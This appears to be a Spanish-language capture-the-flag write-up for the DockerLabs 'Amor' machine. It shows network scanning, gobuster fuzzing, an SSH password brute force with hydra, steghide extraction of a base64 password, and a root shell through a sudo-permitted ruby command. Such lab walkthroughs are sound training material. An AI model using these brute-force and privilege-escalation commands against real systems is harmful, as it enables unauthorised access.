🏴‍☠️
Laboratorios
Book
  • Laboratorios
  • DockerLabs
    • AguaDeMayo
    • Amor
Con tecnología de GitBook
En esta página
  • Escaneo
  • Conexión SSH
  • Esteganografía

¿Te fue útil?

  1. DockerLabs

Amor

AnteriorAguaDeMayo

Última actualización hace 9 meses

¿Te fue útil?

Dificultad
Fecha
Origen

Fácil

22/08/2024

Dockerlabs.es

Escaneo

Lo primero que realizaremos será revisar nuestra interfaz de red con ifconfig -a, para saber a que segmento apuntaremos nuestros escaneos.

Ya con el segmento en vista y la interfaz, realizaremos una consulta a la red con el siguiente comando:

sudo netdiscover -i docker0 -r 172.17.0.0/24

Ya con la búsqueda en la red resulta, realizaremos una búsqueda con nmap

sudo nmap --min-rate 5000 -p- -sS -sV 172.17.0.2

La búsqueda nos devuelve que hay dos puertos abiertos, el 22 y el 80

Abrimos el navegador para revisar el servicio del puerto 80

A la vista no se encuentra nada, así que realizamos un fuzzing para ver si encontrábamos algo, pero adelanto... sin éxito, no hay amor en el sitio web...

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

A esta altura el servicio web no nos dio el amor que buscábamos, pero si nos quedamos con la pista de carlota y juan, así que intentaremos con Hydra por SSH con esos usuarios.

Conexión SSH

Ejecutamos el siguiente comando de hydra, el cual nos da una respuesta positiva al fin.

hydra -l carlota -p /home/kali/Desktop/rockyou.txt ssh://172.17.0.2

Realizamos la conexión SSH con los datos obtenidos:

Navegamos a la siguiente ruta:

cd /carlota/Desktop/fotos/vacaciones

En donde encontrarás un archivo llamado imagen.jpg

Para descargarlo más facil, levanto un servicio web con el comando python3 -m http.server

La imagen descargada es la siguiente:

Esteganografía

Ya es sospechoso que solo exista una imagen entre las rutas, por lo cual decidimos realizar una consulta de esteganografía con steghide

Dentro del archivo secret.txt encontraremos el siguiente código:

Código

ZXNsYWNhc2FkZXBpbnlwb24=

Realizamos una busqueda para saber que tipo de codificación es y nos da por resultado que es base64, así que realizamos una decodificación:

echo "ZXNsYWNhc2FkZXBpbnlwb24=" | base64 -d; echo
Decodificado

eslacasadepinypon

Probamos la contraseña con la usuaria carlota, lo que nos devuelve que la contraseña no corresponde

Revisamos los otros usuarios y decidimos probar con la cuenta oscar su oscar

sudo -l vemos que tenemos acceso a la consola de ruby y la ejecutamos sudo /usr/bin/ruby -e 'exec "/bin/bash"'

Finalmente hacemos un whoami y veremos que somos root !Tachan¡ 🎆 🍺

Nmap (Network Mapper)
Hydra
Steghide
Amor